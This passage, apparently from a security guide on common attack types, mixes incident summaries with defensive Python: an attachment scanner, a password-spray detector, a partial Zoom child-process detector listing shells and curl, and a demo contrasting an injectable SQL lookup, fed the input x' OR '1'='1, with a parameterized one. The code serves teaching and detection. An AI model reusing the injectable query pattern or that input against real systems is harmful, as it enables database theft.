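                if len(parts) > 2:  # e.g. statement.pdf.lnk: the icon and the hidden extension disagree
                    findings.append(("double_extension", name))
    return findings


def build_zip(members):
    """Create an in-memory zip from {member name: content} (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: minimal stand-ins, not real documents.
SAMPLES = {
    "report.docx": build_zip({"[Content_Types].xml": "<Types/>", "word/document.xml": "<w:document/>"}),
    "invoice.docx": build_zip({"[Content_Types].xml": "<Types/>", "word/document.xml": "<w:document/>",
                               "word/vbaProject.bin": b"\x00"}),
    "statement.zip": build_zip({"statement.pdf.lnk": b"L\x00\x00\x00", "readme.txt": "open the statement"}),
}


def scan_all(samples=SAMPLES):
    return {name: scan_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, findings in scan_all().items():
        print(name, findings or "clean")
```

A production gateway would also open legacy binary Office formats (.doc, .xls), which are OLE containers rather than zips, and would unpack nested archives; both are outside this example. The value of the double-extension check is that the .lnk in the passage is usually disguised as a document, and Windows hides the last extension by default.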

Phishing

Spear Phishing
These days spear phishers are not only targeting bigger fish, they’re taking a page from the book of romance scams, luring victims with attractive fake profiles to get them to download malware onto their computers. In 2021, researchers identified a years-long social engineering and targeted malware attack sourced to the renowned Iranian state-aligned threat actor TA456. Using a fake social media profile “Marcella Flores,” TA456 built a romantic relationship with an employee of a small aerospace defense contractor subsidiary. The attacker cashed in a few months later by sending out a large malware file via an ongoing corporate email communication chain with the aim of conducting reconnaissance. Once the malware, dubbed LEMPO, infiltrated the machine, it exfiltrated data and sent highly sensitive information back to the attacker, while obfuscating its whereabouts to evade detection.

Spear Phishing

What you need to know:
A subset of phishing, spear phishing occurs when cybercriminals selectively target victims with a specific, personalized email message to trick targets or a target company’s employees into giving away financial or proprietary data, or unlocking access to the network. Spear phishers target individuals who either have access to sensitive information or are weak links to the network. High-value targets, such as C-level executives, company board members or administrators with elevated privileges, are especially vulnerable, since they have access to critical systems and proprietary information.

How the attack happens:
Spear phishers do their research to identify targets and their professional positions using social media sites like LinkedIn. From there, they spoof addresses to send highly personalized, authentic-looking messages to infiltrate the target’s infrastructure and systems. Once hackers gain access to the environment, they attempt to carry out even more elaborate schemes.

Where the attack comes from:
Individuals and organizations alike are behind this attack. However, many high-profile spear phishing attempts are sourced to state-sponsored cybercrime organizations, which have the resources to research their targets and bypass strong security filters.

Phishing

Whale Phishing (Whaling)
Why go after little phish when you can phish a whale? In 2020, Australian hedge fund Levitas Capital found that out the hard way when attackers launched a stealthy whaling attack aimed directly at one of the founders. The bad actors gained entry to the hedge fund’s network after sending the executive a fake Zoom link that installed malware once it was clicked. The malicious code allowed the attackers to infiltrate the targeted email account and subsequently create bogus invoices to the fund’s trustee and third-party administrator, which initiated and approved cash transfer requests resulting in $8.7 million in theft. The bogus invoices also included a request for a $1.2 million payment to suspicious private equity firm Unique Star Trading. The losses were so damaging and extensive that the firm was eventually forced to permanently close.

Whale Phishing (Whaling)

What you need to know:
Whaling is when hackers go after one single, high-value target, such as a CEO. The target is always someone specific, whereas a phishing email may go after anyone at a company. The hackers also usually go after high-profile targets because they may possess important or sensitive information.

How the attack happens:
The technique used in a whaling attack is a classic phishing practice. The target receives an authentic-looking email, usually asking them to click on a link that contains malicious code or leads to a website that asks for sensitive information, such as a password.

Where the attack comes from:
Phishing is the most common entry point for a cyberattack, which means a whaling attack can originate from anywhere in the world. The Levitas Capital attack, for example, was sourced to a collective of cybercriminals from various regions, with payments sent to Bank of China and United Overseas Bank in Singapore.

Privileged User Compromise
In early 2022, the criminal hacking group Lapsus$, allegedly run by a teenager from Oxford, England, boasted publicly that it had successfully hacked Okta, a single sign-on provider used by thousands of organizations and governments worldwide. Lapsus$ gained access to a “super user” administrative account for Okta via a third-party support engineer and had access to the employee’s laptop for five days, including privileged access to some Okta systems. The cybercrime group posted about the attack on its Telegram channel, even going so far as to post screenshots showing it was inside Okta’s systems. But it wasn’t after Okta, exactly — the real targets were Okta’s thousands of customers. A week later, the hacking group added 15,000 followers to their Telegram channel, raising fears that more attacks are imminent.



Privileged User Compromise

What you need to know:
It’s widely accepted that many serious data breaches can be traced back to the abuse of privileged credentials. These are accounts with elevated privileges, such as users with domain administrator rights or root privileges. Attackers are increasingly using privileged user credentials to access an organization’s resources and information and exfiltrate sensitive data. An attacker that gains access to privileged user credentials can take control of an organization’s infrastructure to modify security settings, exfiltrate data, create user accounts and more, all the while appearing legitimate — and therefore harder to detect.

How the attack happens:
Attackers attempt to gain access to privileged accounts by using social engineering techniques, sending spear-phishing messages, using malware, or “pass the hash” attacks. Organizations have opened their networks to cope with an increasingly mobile, remote workforce, and enable a complex web of remote access used by suppliers and service providers. Many of those connections, including to the cloud, are accessed through powerful privileged account credentials, and finding, controlling and monitoring access to them all is challenging, giving bad actors plenty of openings.

Once armed with the credentials, attackers get in and grab what they can, such as SSH keys, certificates and domain administration hashes. And it takes only one successful account hit to cause a major data breach that can bring an organization to its knees.

Where the attack comes from:
Because it provides attackers with hard-to-detect, wide access to all kinds of data, privileged user compromise is widely appealing and commonly used in cyberattacks of various kinds, whether nation-state cyber espionage motivated by political ideology or sophisticated, financially-motivated cybercrime groups like Lapsus$.



Ransomware
According to cybersecurity company Emsisoft, ransomware attacks affected at
least 948 government agencies, educational establishments and healthcare providers
in the United States in 2019, at a potential cost exceeding $7.5 billion.
In the medical sector, the potential effects of these kinds of attacks include patients being redirected to other hospitals,
medical records being made inaccessible (or permanently lost) and emergency dispatch centers relying on printed
maps and paper logs to keep track of emergency responders in the field. In government, local 911 services can be
disrupted. And according to Manhattan D.A. Cyrus Vance Jr., the effect of ransomware could be as devastating and
costly as a natural disaster like Hurricane Sandy.



Ransomware

What you need to know:
Ransomware is an attack where an infected host encrypts a victim’s data, holding it hostage until they pay the attacker a fee. Recent ransomware attacks have demonstrated that hackers have begun threatening to leak or sell the stolen data, increasing the potential damage of these kinds of attacks by orders of magnitude.

There are countless types of ransomware, but certain groups are especially nefarious. One well-known gang, Blackmatter, has targeted a number of organizations critical to the U.S. economy and infrastructure, including the food and agriculture industry. Ryuk is another type of ransomware to watch out for. As of 2019, Ryuk had the highest ransom on record at $12.5 million.

How the attack happens:
Attackers can deploy ransomware to businesses and individuals through spear phishing campaigns and drive-by downloads, as well as through traditional remote service-based exploitation. Once the malware is installed on the victim’s machine, it either prompts the user with a pop-up or directs them to a website, where they’re informed that their files are encrypted and can be released if they pay the ransom.

Where the attack comes from:
Ransomware has typically been the work of advanced cybercriminal groups, as remaining anonymous after extorting governments or major enterprises requires technological sophistication. However, since the arrival of cryptocurrencies, which simplify anonymous transactions, the general population is at greater risk of ransomware attack.



Ransomware-as-a-Service
Ransomware-as-a-Service (RaaS) is a business model built around ransomware, the extortion of victims over stolen or encrypted
data. The author of the ransomware makes the software available to customers called affiliates, who use the software to hold
people’s data hostage with little technical skill. WannaCry had one of the largest RaaS attack vectors to date, with
upwards of 400,000 computers infected across 150 countries. WannaCry infiltrated networks using the EternalBlue
vulnerability in Microsoft’s implementation of the Server Message Block (SMB) protocol. EternalBlue was a cyberattack
exploit originally developed by the U.S. National Security Agency (NSA), which did not alert Microsoft about the
vulnerabilities and held on to it for more than five years before the breach forced the agency to come clean about the issue.



Ransomware-as-a-Service

What you need to know:
RaaS is a business model between ransomware operators and affiliates in which affiliates pay to launch ransomware attacks developed by operators. RaaS kits allow affiliates lacking the skill or time to develop their own ransomware variant to be up and running quickly and affordably. A RaaS kit may include 24/7 support, bundled offers, user reviews, forums and other features identical to those offered by legitimate SaaS providers.

How the attack happens:
Ransomware is an ever-present risk to enterprises, wherein an infected host encrypts business-critical data, holding it hostage until the victim pays the attacker a ransom. Attackers can deploy ransomware to enterprises through spearphishing campaigns and drive-by downloads, as well as through traditional remote service-based exploitation.

Where the attack comes from:
Because RaaS kits are relatively easy to use and very easy to find on the dark web, where they are widely advertised, this attack could come from any beginning hacker with the money to buy a kit.



Router and Infrastructure Security
Cisco was the victim of a router and infrastructure attack in which
a router “implant,” dubbed SYNful Knock, was reportedly found in 14
routers in four different countries. SYNful Knock is a type of persistent malware that allows an attacker to gain control
of an affected device and compromise its integrity with a modified Cisco IOS software image. Mandiant describes it as
having different modules enabled via the HTTP protocol and triggered by crafted TCP packets sent to the device.



Router and Infrastructure Security

What you need to know:
Router implants have been rare, and are largely believed to be theoretical in nature and use. However, recent vendor advisories indicate that these have been seen in the wild. The initial infection vector does not appear to leverage a zero-day vulnerability. It is believed that the credentials are either default or discovered by the attacker in order to install the backdoor. However, the router’s position in the network makes it an ideal target for re-entry or further infection.

How the attack happens:
Networking devices, such as routers and switches, are often overlooked as resources that attackers will leverage to subvert an enterprise. Attackers compromise network devices and can then obtain direct access to the company’s internal infrastructure — effectively increasing the attack surface and accessing private services/data.

Where the attack comes from:
Advanced threat actors have shown a proclivity to target these critical assets as a means to siphon and redirect network traffic, flash backdoored operating systems and implement cryptographically weakened algorithms to more easily decrypt network traffic.



Shadow IT
As software-as-a-service applications have become
increasingly quick and easy to use, employees can now download
solutions onto their workstations to help them get the job done.
However, many are using these applications with little regard for security. It’s not surprising then that a 2019 Forbes
Insights survey titled “Perception Gaps in Cyber Resilience: Where Are Your Blind Spots?” found that more than one in
five organizations experienced a cyber incident originating from an unauthorized — or “shadow” — IT resource.



Shadow IT

What you need to know:
Shadow IT refers to IT applications and infrastructure that employees use without the knowledge and/or consent of their organization’s IT department. These can include hardware, software, web services, cloud applications and other programs. In general, well-intentioned employees innocently download and use these applications to make their work easier or more efficient. It’s a phenomenon so pervasive that Gartner had estimated that a third of all enterprise cybersecurity attacks would be from shadow IT resources in 2020. Because users are accessing these applications largely under the radar, they are often unintentionally opening the floodgate for insider threats, data breaches and compliance violations.

How the attack happens:
As the name suggests, the secretive nature of shadow IT is due to employees sharing or storing data on unauthorized cloud services, setting the stage for a host of security and compliance risks. Breaches can occur when employees upload, share or store critical or regulated data into shadow IT apps without appropriate security and data loss prevention (DLP) solutions. The exposed information then provides an easy target for insider threats and data theft, and can also lead to costly compliance violations. In addition, the applications themselves might be fraught with endpoint vulnerabilities and security gaps.

Where the attack comes from:
In this case, the threat originates from within an organization. Employees using shadow IT apps often do so to get around a prohibitive policy or to get work done faster — not necessarily to put their employers and coworkers at risk. However, they ultimately leave the door wide open for malicious insiders or external hackers looking to exploit security holes in these systems.



Simjacking
On August 30, 2019, Twitter CEO Jack Dorsey’s 4.2 million followers were subjected to a stream of deeply offensive messages,
courtesy of a group of hackers called the “Chuckling Squad.” The group used simjacking to gain control of Dorsey’s phone
number, then used a text-to-tweet service acquired by Twitter to post the messages. Despite the messages being visible online
for fewer than ten minutes, millions of people were exposed to the offensive tweets.



Simjacking

What you need to know:
SIMjacking (also known as a SIM swap scam, port-out scam, SIM splitting and SIM swapping) is a type of account takeover that generally targets a weakness in two-factor authentication and two-step verification in which the second factor is a text message (SMS) or call placed to a mobile telephone. Simply put, simjacking is when an attacker impersonates a target to a cellular provider in order to steal their cell phone number by having it transferred to a different SIM card (which is already in the hacker’s possession).

How the attack happens:
A hacker calls the support line for a mobile service provider, pretending to be the target, saying they’ve lost their SIM card. They can verify their identity because they have acquired some amount of the target’s personal information (address, passwords or SSN) through one of the many database hacks in the last decade. The service provider’s employee, having no way of knowing that the person on the other end of the line is not who they say they are, makes the switch. Instantly, that phone number — the key associated with so much of digital life — is under the attacker’s control.

Where the attack comes from:
Simjackers are typically looking to extort victims for something of great value — like Bitcoin or other cryptocurrency wallets or high-value social media accounts — or to cause harm to their reputations, as Chuckling Squad did with Jack Dorsey. These hackers can come from anywhere in the world, and can be members of organized groups or solitary actors.



Social Engineering Attack
The 2002 film “Catch Me If You Can” tells the true story of (perhaps) one of the most accomplished practitioners of
social engineering of all time. In the film, Leonardo DiCaprio portrayed a man named Frank W. Abagnale, Jr., who executed
various high-profile cons, committed bank fraud and masqueraded in a variety of personas, including as a physician and
pilot. Abagnale’s success depended on his ability to convince his victims that his forgeries, whether they were checks,
diplomas or identities, were genuine. Abagnale was an active con man in the ‘60s and ‘70s, but the practice of social
engineering has continued to develop and remains a powerful tool for hackers and fraudsters to gain access to closed
systems around the world.



Social Engineering Attack

What you need to know:
Social engineering is the term used for a broad range of malicious activities accomplished through psychological manipulation to trick users into making security mistakes or giving away sensitive information. What makes social engineering especially dangerous is that it relies on human error, rather than vulnerabilities in software and operating systems. Mistakes made by legitimate users are much less predictable, making them harder to identify and thwart than a malware-based intrusion.

How the attack happens:
Social engineering attacks come in many different forms and can be performed anywhere where human interaction is involved (five common forms of digital social engineering are described under “Where the attack comes from”). A perpetrator first investigates the intended victim to gather the necessary background information — such as potential points of entry and weak security protocols — needed to proceed with the attack. Then, the attacker gains the victim’s trust and provides stimuli for subsequent actions that break security practices, such as revealing sensitive information or granting access to critical resources.

Where the attack comes from:
Social engineering can take many forms and come from many sources and motivations. Most commonly, it comes in the form of phishing emails. Other forms include pretexting, where the attacker creates a good pretext to steal important data; baiting and quid pro quo, in which the attacker offers the victim something desirable in exchange for providing login credentials; and tailgating or piggybacking, in which an attacker gains access to a restricted area of a business by following an authenticated employee through secure doors.



Spyware
It’s no secret that spyware attacks continue to occur with alarming
frequency. But if you’re a high-profile figure, you’re likely a bigger target.
In May of 2021, officials announced that bad actors had targeted the
cellphones of Spanish Prime Minister Pedro Sánchez and Defense Minister
Margarita Robles in several attacks using the Pegasus spyware, resulting
in significant data theft from both devices while wreaking havoc on Spain’s
administrators and government systems.



Spyware

What you need to know:
Spyware is a type of malware that aims to gather personal or organizational data, track or sell a victim’s web activity (e.g., searches, history and downloads), capture bank account information and even steal a target’s identity. Multiple types of spyware exist, and each one employs a unique tactic to track the victim. Ultimately, spyware can take over a device, exfiltrating data or sending personal information to another unknown entity without prior knowledge or consent.

How the attack happens:
Spyware can install itself on a victim’s device through various means, but will commonly get a foothold in a system by duping the target or exploiting existing vulnerabilities. This can happen when a user carelessly accepts a random prompt or pop-up, downloads software or upgrades from an unreliable source, opens email attachments from unknown senders, or pirates movies and music.

Where the attack comes from:
Thanks to crimeware kits that are now readily available, this type of attack can come from anyone and anywhere. But more often than not, they’ll originate from nefarious organizations looking to sell a victim’s information to a third party.



SQL Injection
Structured Query Language, or SQL (sometimes pronounced “sequel”), is the standard
programming language used to communicate with relational databases — systems that
support every data-driven website and application on the internet. An attacker can take
advantage of this (very common) system by entering a specific SQL query into the form
(injecting it into the database), at which point the hacker can access the database, network and servers. And SQL injection
attacks continue to be a popular attack method. As recently as August of 2020, the Freepik Company disclosed a data
breach impacting the logins of more than eight million users resulting from an SQL injection in a global database of
customizable icons, which allowed the hackers to access and ultimately steal user login and personal information.



SQL Injection

What you need to know:
SQL injection is a type of injection attack used to manipulate or destroy databases using malicious SQL statements. SQL statements control the database of your web application and can be used to bypass security measures if user inputs are not properly sanitized.

How the attack happens:
A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data, execute administration operations on the database, recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system.

Where the attack comes from:
Because so much of the internet is built on relational databases, SQL injection attacks are exceedingly common. Searching the Common Vulnerabilities and Exposures database for “injection” returns 15,000 results.
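The “injection via the input data from the client” described above is easiest to see side by side with its fix. The Python below is an added example written for this edition, not code from the Splunk report; it seeds an in-memory SQLite table with constructed users and contrasts a lookup that splices client input into the SQL text with the parameterized form, which sends the same input as a bound value the database never parses as SQL.

```python
import sqlite3

# Constructed sample table, standing in for a web application's user store.
SAMPLE_USERS = [
    ("alice", "hash-1", "admin"),
    ("bob", "hash-2", "user"),
    ("carol", "hash-3", "user"),
]


def build_db() -> sqlite3.Connection:
    """Create an in-memory database seeded with the constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Vulnerable: client input is spliced straight into the SQL text.

    A value containing a quote character closes the string literal, and
    whatever follows is parsed as SQL. The WHERE clause the developer
    wrote is no longer the WHERE clause the database runs.
    """
    query = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, username: str) -> list:
    """Hardened: the SQL text is fixed at write time and the value travels
    as a bound parameter, so a quote in the input is just data.
    """
    query = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


def demo(conn: sqlite3.Connection = None) -> dict:
    """Run both lookups on a normal username and on a constructed input that
    closes the literal and appends an always-true condition."""
    conn = conn or build_db()
    benign = "bob"
    hostile = "x' OR '1'='1"  # constructed test input
    return {
        "vulnerable_benign": lookup_vulnerable(conn, benign),
        "vulnerable_hostile": lookup_vulnerable(conn, hostile),
        "safe_benign": lookup_parameterized(conn, benign),
        "safe_hostile": lookup_parameterized(conn, hostile),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The vulnerable lookup returns every row for the hostile input, which is the data-reading outcome the table describes; the parameterized lookup returns nothing because no user is literally named `x' OR '1'='1`.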



Supply Chain Attack
The SolarWinds attacks, which some experts have called the worst series of cybersecurity attacks
in history, are a prime example of the damage a supply chain attack can inflict. In 2020, sophisticated
attackers believed to have been directed by the Russian intelligence service, compromised SolarWinds
software. They embedded it with malware that was then deployed through a product update, giving
them backdoor access to all of SolarWinds Orion Platform customers’ networks. Up to 18,000 customers
installed updates that left them vulnerable to hackers, including Fortune 500 companies and multiple
agencies in the U.S. government. As Tim Brown, vice president of security at SolarWinds, said recently,
“it’s really your worst nightmare.”



Supply Chain Attack

What you need to know:
A supply chain attack is a powerful cyberattack that can breach even the most sophisticated security defenses through legitimate third-party vendors. Because vendors need access to sensitive data in order to integrate with their customers’ internal systems, when they are compromised in a cyberattack, often their customers’ data is too. And because vendors store sensitive data for numerous customers, a single supply chain attack gives hackers access to the sensitive data of many organizations, across many industries. The severity of supply chain attacks cannot be overstated. And the recent spate of these attacks suggests this method is now the state actors’ attack du jour.

How the attack happens:
A supply chain attack uses legitimate, trusted processes to gain full access to organizations’ data by targeting the vendor’s software source code, updates or build processes. They are difficult to detect because they happen at an offset to the attack surface. Compromised vendors then unwittingly transmit malware to their customer network. Victims can be breached through third-party software updates, application installers and through malware on connected devices. One software update can infect thousands of organizations, with minimal effort from the hacker, who now has “legitimate” access to move laterally across thousands of organizations.

Where the attack comes from:
Supply chain attacks are large-scale, sophisticated attacks perpetrated by sophisticated threat actors, often nation-state sponsored and ideologically motivated, though financial gain is also a big motivation.



Suspicious Cloud Authentication Activities
Now more than ever, identity access management (IAM) has become a critical part of cloud security. In 2022 alone,
84% of organizations fell victim to identity-related breaches, with 96% reporting that the breach could have been avoided or
minimized by implementing identity-centric security.
Without the correct technologies and policies in place (e.g. zero trust and vendor management), identifying anomalous
behavior via authentication and authorization can be incredibly tricky. As a result, these attacks often go undetected, as
the authentication performed by a bad actor can look the same as a legitimate user, depending on how expansive the IAM
framework in place is (let alone if it even exists).
Suspicious Cloud Authentication Activities

What you need to know:
Organizations need to move away from network security in order to better protect and authenticate user identities. Up until recently, however, this was much easier said than done. Certain technologies simply lacked the necessary integration capabilities, limiting an organization’s ability to centrally monitor the overall security of their resources.

Now there are countless technologies available that revolve around access control, like multifactor authentication (MFA). To avoid illegitimate authentication on cloud applications, no user or device — whether internal or external to the organization — should be implicitly trusted, and access to all resources should be explicitly and continuously authenticated and authorized.

How the attack happens:
The threat or attacker can easily penetrate the network/breach the perimeter when there’s a distinct lack of or a weak IAM framework, and when an organization is still relying on network/endpoint security. In both instances, because the identity access controls are so lax, the attacker can easily log in with the stolen credentials without being detected, and then move laterally across the network, as well as any connected systems, compromising assets and causing irrevocable damage — ultimately giving them free rein.

Where the attack comes from:
Between the growing number of phishing attacks, increasing number of user identities and the continued growth of cloud adoption, this type of attack can come from anywhere, including third-party vendors, employees, remote workers and contractors.



Suspicious Cloud Storage Activities
According to the 2022 Verizon Data Breach Investigations Report (DBIR), a staggering 82% of breaches involve a “human
element,” with “miscellaneous errors” on the rise due to misconfigured cloud storage. The Sensitive Data in the Cloud report
also found that the majority of security and IT professionals (67%) are storing sensitive data in public cloud environments,
with a third of respondents saying that they weren’t confident — or only slightly confident — about their ability to protect
sensitive data in the cloud.
This type of technical and professional oversight — whether it involves a misconfigured database or security teams lacking
the necessary know-how — is exactly why cloud accounts have become a prime target in this era of remote work.



Suspicious Cloud Storage Activities

What you need to know:
Now that data is widely (and all too often, haphazardly) dispersed across the cloud, attackers have ample opportunity to find and exploit both known and unknown vulnerabilities. This is especially true as organizations hurriedly migrate to the cloud, potentially compromising or misconfiguring certain security controls.

To complicate matters further, assets and applications need to be secured per the shared responsibility model, where cloud service providers (CSPs) will cover certain elements, processes and functions, but then the customer is responsible for securing its proprietary data, code and any other assets of note, per the Cloud Security Alliance (CSA). But when that responsibility is shirked, hackers inevitably abound.

How the attack happens:
An attack on cloud storage happens when a bad actor gets a foothold within the organization’s cloud infrastructure due to incorrect, lax or nonexistent security settings. Once inside, they’ll start disabling certain controls, like access monitoring. They may create new accounts for continued access, while executing commands that aren’t typical for the type of user or system in question. They could also change the policies of certain storage buckets, so that an organization’s files are accessible to the public, leading to data exfiltration. Fortunately, these are all notable events, and will be easy to track and identify in the CSP’s audit logs.

Where the attack comes from:
One example of how this can happen is if a developer runs an outdated instance of a cloud function or application. This could contain known vulnerabilities that were eventually patched in a later version. But since an older program is running, attackers can use this as an entry point before they move laterally across the cloud environment.



Suspicious Okta Activity
Okta is often the gateway to enterprise applications and accounts — a fact
not lost on hackers. If exploited, the SSO flaw allows hackers to abuse
credentials of existing accounts for unauthorized access, persistence, privilege escalation and defense evasion. Once
credentials are compromised, attackers can then bypass access controls to gain entrance to VPNs, Outlook Web Access and
remote desktop. Adversaries can also use compromised credentials to elevate their privileges to certain systems or gain entry
to restricted areas of the network, while also using malware to steal information and/or obfuscate their presence. In one attack
scenario, hackers can take over inactive accounts of employees who have left the organization and use their credentials to gain
access to critical systems for data and identity theft activities.



Suspicious Okta Activity

What you need to know:
Okta is the leading single sign on provider, allowing users to authenticate once to Okta, and from there access a variety of web-based applications. These applications are assigned to users and allow administrators to centrally manage which users are allowed to access which applications. Okta also provides centralized logging to help understand how the applications are used and by whom.

While SSO is a major convenience for users, it also provides attackers with an opportunity. If the attacker can gain access to Okta, they can access a variety of applications.

Password spraying attacks, which are essentially brute force attacks, feed numerous usernames into an automated program that attempts to guess associated passwords. As the name implies, it relies on a “spray” technique in the hopes that one of the username/password combinations is correct. And it only takes one.

How the attack happens:
Once exploited, this vulnerability enables a credential stuffing attack, in which the bad actor acquires usernames and passwords from a variety of sources such as breached websites, phishing attacks and password dump sites. By conducting brute force attacks with the help of automated tools, the adversary tests those credentials at scale against a plethora of websites to see if any logins are successful and gain access to the site. From there, attackers have the ability to launch any number of attacks, including launching phishing or spam campaigns, accessing PII and other sensitive information, and financially draining stolen accounts.

Where the attack comes from:
These attacks can essentially come from anywhere. While it is possible that they can be traced to sophisticated cybercrime networks, they can also be executed by less sophisticated, individual, remote hackers with access to automated tools that can conduct a copious number of brute force attacks at once.
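Password spraying as described above leaves a distinctive trace in the centralized log Okta provides: one source address failing against many different usernames in a short window. The Python below is an added example, not code from the Splunk report or from Okta, that scores constructed events modelled on Okta System Log field names (eventType, outcome.result, client.ipAddress, actor.alternateId) and also reports any successful login from a flagged address, since it only takes one. The window and the distinct-user threshold are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Tunable assumptions: how many distinct accounts one address may fail
# against, inside what window, before it looks like a spray.
WINDOW = timedelta(minutes=10)
DISTINCT_USER_THRESHOLD = 5


def _event(published, ip, user, result, reason=None):
    """Build a constructed event shaped like an Okta System Log entry."""
    return {"published": published, "eventType": "user.session.start",
            "client": {"ipAddress": ip}, "actor": {"alternateId": user},
            "outcome": {"result": result, "reason": reason}}


# Constructed sample events (not real log data). 198.51.100.7 is an
# office address with one mistyped password; 203.0.113.9 tries one
# password against six accounts and gets in on the last one.
SAMPLE_EVENTS = [
    _event("2023-05-02T08:01:10.000Z", "198.51.100.7", "dana@example.com",
           "FAILURE", "INVALID_CREDENTIALS"),
    _event("2023-05-02T08:01:40.000Z", "198.51.100.7", "dana@example.com",
           "SUCCESS"),
] + [
    _event(f"2023-05-02T08:10:{3 * i:02d}.000Z", "203.0.113.9",
           f"{name}@example.com", "FAILURE", "INVALID_CREDENTIALS")
    for i, name in enumerate(["ahmed", "bea", "chen", "dmitri", "erin"])
] + [
    _event("2023-05-02T08:10:15.000Z", "203.0.113.9", "farid@example.com",
           "SUCCESS"),
]


def parse_ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%fZ")


def detect_password_spray(events: List[dict], window: timedelta = WINDOW,
                          threshold: int = DISTINCT_USER_THRESHOLD) -> List[dict]:
    """Return one finding per source address whose failed logins cover at
    least `threshold` distinct accounts inside any `window`-long span.

    Counting distinct users rather than raw failures is what separates a
    spray from one person retrying their own password. An attacker who
    rotates source addresses defeats this keying, so a companion rule
    keyed on the targeted accounts or the client user-agent is also needed.
    """
    failures: Dict[str, list] = defaultdict(list)
    successes: Dict[str, list] = defaultdict(list)
    for ev in events:
        if ev.get("eventType") != "user.session.start":
            continue
        ip = ev["client"]["ipAddress"]
        rec = (parse_ts(ev["published"]), ev["actor"]["alternateId"])
        result = ev["outcome"]["result"]
        if result == "FAILURE":
            failures[ip].append(rec)
        elif result == "SUCCESS":
            successes[ip].append(rec)

    findings = []
    for ip, fails in failures.items():
        fails.sort()
        for i, (start, _) in enumerate(fails):
            users = {u for t, u in fails[i:] if t - start <= window}
            if len(users) >= threshold:
                # Any success from the same address after the spray began
                # is the login the attacker was looking for.
                hits = [u for t, u in successes[ip] if t >= start]
                findings.append({"source_ip": ip,
                                 "window_start": start.isoformat(),
                                 "distinct_users_failed": len(users),
                                 "successful_logins_after": hits})
                break
    return findings


if __name__ == "__main__":
    for finding in detect_password_spray(SAMPLE_EVENTS):
        print(finding)
```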
Suspicious Zoom Child Processes
Video-conferencing giant Zoom has emerged as the top enterprise video
communications platform over the last several years. Its usage has increased
dramatically with an upsurge of remote workers, attributed largely to shelter-in-place mandates following the COVID-19
pandemic. However, as Zoom’s popularity soared, flaws in both Windows and macOS systems have correspondingly
received increased scrutiny by bad actors, who have increasingly relied on this attack vector to gain unauthorized
access and escalate privileges onto targeted systems — including exploiting a local library validation function in
Zoom to completely hijack an unsuspecting user’s webcam and microphone. Plausible attack scenarios could mean
that attackers use their ill-gotten privileges to spy on targeted users, either in their personal lives or during important
meetings where sensitive information is being shared.



Suspicious Zoom Child Processes

What you need to know:
Essentially, these local privilege escalation flaws take advantage of Zoom’s software architecture designs. These exploits can be launched by a local attacker, in which the adversary is someone who already has physical control of a vulnerable computer. Once the bugs are exploited, attackers can gain and sustain persistent access to various functions of a victim’s computer, which allows them to install ransomware, Trojans, spyware and numerous other types of malicious code into targeted systems for nefarious purposes.

How the attack happens:
One way this attack can happen is through the Zoom installer designed to install the Zoom macOS app without any user interaction. In this scenario, a local adversary with low-level user privileges can inject the Zoom installer with malware to obtain the highest, root-level privileges that allow them to access the underlying Mac operating system, making it easier to run malware or spyware without the consent or knowledge of the user.

Another bug exploits a flaw in Zoom’s local library validation function. An attacker can load a malicious third-party library into Zoom’s process/address space, which automatically inherits all of Zoom’s access rights, and gain control over camera and microphone permissions without the user’s knowledge or consent.

Where the attack comes from:
What makes this particular vulnerability unique is that an attacker needs physical access to a victim’s computer in order to exploit its multiple flaws. So this attack either comes from the inside, or from hackers who have gained access to a lost or stolen laptop or computer system. Another attack scenario includes a post-malware infection that could be perpetrated by a remote adversary, but with pre-existing access to the targeted system, likely via a prior malware exploit.
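A defender's counterpart to the section title above is to baseline which processes the Zoom client normally spawns and alert on anything else, especially a shell or a binary run from a user-writable directory. The following is an added example, not Splunk's detection content; the event fields, the allowlists and the sample telemetry are constructed for illustration.

```python
"""Flag unexpected child processes of the Zoom client in process-creation telemetry.

Added example, not Splunk's own detection content: the event fields, the
allowlists and the sample events below are constructed for illustration.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_name: str  # image name of the parent process
    child_name: str   # image name of the spawned child
    child_path: str   # full path of the child's executable


# Assumed names of the Zoom client process and of the helpers it normally spawns
# (tune to what your own fleet's baseline actually shows).
ZOOM_PARENTS = {"zoom.us", "zoom.exe"}
EXPECTED_CHILDREN = {"zoom.us", "zoom.exe", "cpthost", "cpthost.exe", "zoomopener"}
# Shells and interpreters a meeting client has no legitimate reason to launch.
HIGH_RISK_CHILDREN = {"bash", "sh", "zsh", "osascript", "python3", "powershell.exe", "cmd.exe", "curl"}
# User-writable locations from which a dropped library or binary would typically run.
WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "c:/users/public/")


def classify(ev: ProcEvent):
    """Return None for benign events, otherwise a severity string."""
    if ev.parent_name.lower() not in ZOOM_PARENTS:
        return None
    child = ev.child_name.lower()
    if child in EXPECTED_CHILDREN:
        return None
    path = ev.child_path.lower().replace("\\", "/")
    if child in HIGH_RISK_CHILDREN or path.startswith(WRITABLE_PREFIXES):
        return "high"
    return "medium"  # unknown child: review, it may be a new legitimate helper


def suspicious_zoom_children(events):
    """Return (host, child_name, severity) for every event worth an analyst's look."""
    return [(ev.host, ev.child_name, sev) for ev in events if (sev := classify(ev))]


# Constructed sample telemetry: one expected helper, one shell, one binary run from
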